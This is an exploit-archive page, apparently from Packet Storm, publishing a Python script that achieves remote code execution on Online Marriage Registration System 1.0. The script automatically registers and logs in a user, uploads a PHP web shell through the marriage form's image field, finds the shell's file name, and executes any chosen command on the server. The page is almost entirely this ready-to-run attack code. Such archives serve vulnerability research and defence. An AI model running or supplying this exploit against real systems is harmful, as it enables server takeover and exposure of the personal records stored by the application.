what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Online Marriage Registration System 1.0 Remote Code Execution

Online Marriage Registration System 1.0 Remote Code Execution
Posted Feb 11, 2021
Authored by Ricardo Jose Ruiz Fernandez

Online Marriage Registration System (OMRS) version 1.0 remote code execution exploit. Original discovery of remote code execution in this version was discovered by Selim Enes Karaduman in June of 2020.

tags | exploit, remote, code execution
SHA-256 | 0b988c57a1f19668b972345f07ad174bcbd8fba23062032536f90e7035468ee9

Online Marriage Registration System 1.0 Remote Code Execution

Change Mirror Download
# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)
# Date: 10/02/2021
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10/Xampp Server and Wamp Server
# Porting an existing exploit (https://www.exploit-db.com/exploits/49260, for macOs) to Linux/Windows. Adding the possibility of automatic registration and execution of any command without needing to upload any local file
# Example with registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami'
# Example without registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami' -m 680123456 -p dante123

import os
import sys
import random
import argparse
import requests


def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', required=True, action='store', help='Url of Online Marriage Registration System (OMRS) 1.0')
parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
parser.add_argument('-m', '--mobile', required=False, action='store', help='Mobile phone used for registration')
parser.add_argument('-p', '--password', required=False, action='store', help='Password used for registration')
my_args = parser.parse_args()
return my_args


def login(url, mobile, password):
url = "%s/user/login.php"%(url)
payload = {'mobno':mobile, 'password':password, 'login':''}
req = requests.post(url, data=payload)
return req.cookies['PHPSESSID']


def upload(url, cookie, file=None):
url = "%s/user/marriage-reg-form.php"%url
files = {'husimage': ('shell.php', "<?php $command = shell_exec($_REQUEST['cmd']); echo $command; ?>", 'application/x-php', {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
payload = {'dom':'05/01/2020','nofhusband':'omrs_rce', 'hreligion':'omrs_rce', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'omrs_rce','hzipcode':'omrs_rce','hstate':'omrs_rce','hadharno':'omrs_rce','nofwife':'omrs_rce','wreligion':'omrs_rce','wsbmarriage':'Bachelor','waddress':'omrs_rce','wzipcode':'omrs_rce','wstate':'omrs_rce','wadharno':'omrs_rce','witnessnamef':'omrs_rce','waddressfirst':'omrs_rce','witnessnames':'omrs_rce','waddresssec':'omrs_rce','witnessnamet':'omrs_rce','waddressthird':'omrs_rce','submit':''}
req = requests.post(url, data=payload, cookies={'PHPSESSID':cookie}, files=files)
print('[+] PHP shell uploaded')


def get_remote_php_files(url):
url = "%s/user/images"%(url)
req = requests.get(url)
php_files = []
for i in req.text.split(".php"):
php_files.append(i[-42:])
return php_files


def exec_command(url, webshell, command):
url_r = "%s/user/images/%s?cmd=%s"%(url, webshell, command)
req = requests.get(url_r)
print("[+] Command output\n%s"%(req.text))


def register(mobile, password, url):
url_r = "%s/user/signup.php"%(url)
data = {"fname":"omrs_rce", "lname":"omrs_rce", "mobno":mobile, "address":"omrs_rce", "password":password, "submit":""}
req = requests.post(url_r, data=data)
print("[+] Registered with mobile phone %s and password '%s'"%(mobile,password))


if __name__ == "__main__":
args = get_args()
url = args.url
command = args.command
mobile = str(random.randint(100000000,999999999)) if args.mobile is None else args.mobile
password = "dante123" if args.password is None else args.password
if args.password is None or args.mobile is None:
register(mobile,password,url)
cookie = login(url, mobile, password)
initial_php_files = get_remote_php_files(url)
upload(url, cookie)
final_php_files = get_remote_php_files(url)
webshell = (list(set(final_php_files) - set(initial_php_files))[0]+".php")
exec_command(url,webshell,command)

Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    26 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    18 Files
  • 21
    Jun 21st
    8 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    19 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close